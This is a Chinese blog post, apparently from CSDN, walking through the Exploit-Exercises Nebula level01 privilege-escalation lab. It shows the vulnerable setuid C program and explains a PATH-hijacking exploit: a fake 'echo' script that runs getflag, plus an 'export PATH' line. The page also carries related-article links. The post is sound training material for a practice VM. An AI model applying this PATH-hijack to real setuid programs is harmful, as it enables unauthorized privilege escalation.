nebula 01

最新推荐文章于 2018-05-07 22:00:14 发布
最新推荐文章于 2018-05-07 22:00:14 发布
阅读量526 收藏
点赞数 1
文章标签: 漏洞 nebula shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weicz/article/details/38714401
版权

这一关是找出一个程序可以执行任意程序的漏洞

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <string.h>
 4#include <sys/types.h>
 5#include <stdio.h>
 6
 7int main(int argc, char **argv, char **envp)
 8{
 9  gid_t gid;
10  uid_t uid;
11  gid = getegid();
12  uid = geteuid();
13
14  setresgid(gid, gid, gid);
15  setresuid(uid, uid, uid);
16
17  system("/usr/bin/env echo and now what?");
18}
问题出在/usr/bin/env这个命令,用这个命令启动后面的shell命令

在自己的主目录建立一个叫echo的脚本,想执行什么就写什么,然后权限设置为可执行,接下来把当前目录加到PATH环境变量的最前端

export PATH=/home/level01/:$PATH

然后执行这个程序,就可以调到我们的假的echo命令了

echo:

#!/bin/bash

getflag

weicz
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
Nebula level00
无心插柳
08-28 6965
首先从nebula开始,nebula设置了19个level,level00-level19,每一个level对应系统中的一个登陆账号,每一个level也对应home目录下的flag00-flag19这些账号。 一般来说如果你能用levelXX登陆,经过提权你的账号变成了flagXX,就表示你过关了。 下面会将每一个level的要求以及相关的代码列出来,我自己的解决办法和涉及到得知识点也会列出来
nebula 00
weicz的专栏
08-20 754
第一关 find / -perm 4000  找到设置了setuid的程序执行
Nebula level01
无心插柳
11-08 6859
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01 . Files for t
从 Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点
giantbranch的专栏
03-25 1635
从 Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点第一次使用markdown进行写文章,其实如果markdown编辑器支持qq截图直接粘贴就好了我觉学习了就应该有个总结,这样才会更加的牢固 Exploit Exercises Nebula level00-19 学习记录搜索setuid/setgid的程序搜索一个setuid的程序,我们可以根据它的用户i
nebula
03-29
Nebula是便携式的,并且可以在Linux,OSX和Windows上运行。 (也:保持安静,但是我们有一个在iOS上运行的早期原型)。 它可以用于连接少量计算机,但也可以连接数万台计算机。 支持的架构 我们的映像支持多种架构...
Nebula
03-09
执照Nebula13的代码已获得,可以在找到完整的代码。 git作者日期在1420675200 +0000 (2015/01/08 00:00 GMT)之前的代码已根据GNU通用公共许可证版本3获得许可,该版本可在找到完整内容。 假定作者日期在1420675200...
eclipse nebula部件
12-31
Nebula 提供了一组自定义的SWT控件和其它UI组件。 将nebula.zip解压到eclipse的安装目录下的dropins文件夹中clean方式重启eclipse
nebula-V3.3.0镜像资源包
最新发布
01-23
nebula-V3.3.0镜像资源包,包含meta、storged及graphd对应的镜像,以及nebula-console文件
NebulaMarco编辑.rar
08-17
软件名称:Nebula编辑器 软件版本:ver1.00 软件性质:免费软件 软件用途:仅用于对Nebula模拟器的文件进行编辑。不可用于其它模拟器。
i春秋 - Exploit-Exercises: Nebula - level01
无节操
02-25 2530
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?To do this level, log in as the level01 account with the password level01. Files for th
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1484
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
Exploit-exercises
MillionSky的专栏
04-09 2057
1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为:https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目,用于学习各种计算机安全问题,如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。 目前有几个板块:Nebula、Protostar、Fusion、Main Sequence、Clo...
nebula练习
weicz的专栏
08-20 909
最近玩网络攻击,想起了很久以前看到的一个网站,非常好,是练习网络攻击的很好的入门jiao
黑客入门之fusion level01
无心插柳
09-29 6856
黑客入门基本技能,重要的是思想和思考问题的方法,通过做题来一步一步达到一个脚本小子的水平。
ExploitExercises_Nebula_Level01
小黑话不多
12-26 1375
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
的编辑
qq_42128258的博客
05-07 796
  虽然Excel为我们提供了的录制功能,让我们能够轻轻松松地进行的制作,并且大多数任务都可以通过的录制来实现,但是这样录制处理的也有局限性,比如无法进行判断或者循环、人机无法交互等。因此我们就需要通过编辑代码的方式对录制的进行修改和完善。这里还是以创建“员工工资条”为例。  打开“对话框”,在“名”列表框中选择“创建工资条”,点击“编辑”按钮,打开“Visual Basic编辑器”...
i春秋 - Exploit-Exercises: Nebula - level02
无节操
02-25 1137
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?Source code#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/ty
mac安装nebula
08-17
要在Mac上安装Nebula,您可以按照以下步骤进行操作: 1. 首先,确保您的Mac系统已经安装了Homebrew。如果没有安装,请打开终端并输入以下命令安装Homebrew: ``` /bin/bash -c "$(curl -fsSL ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值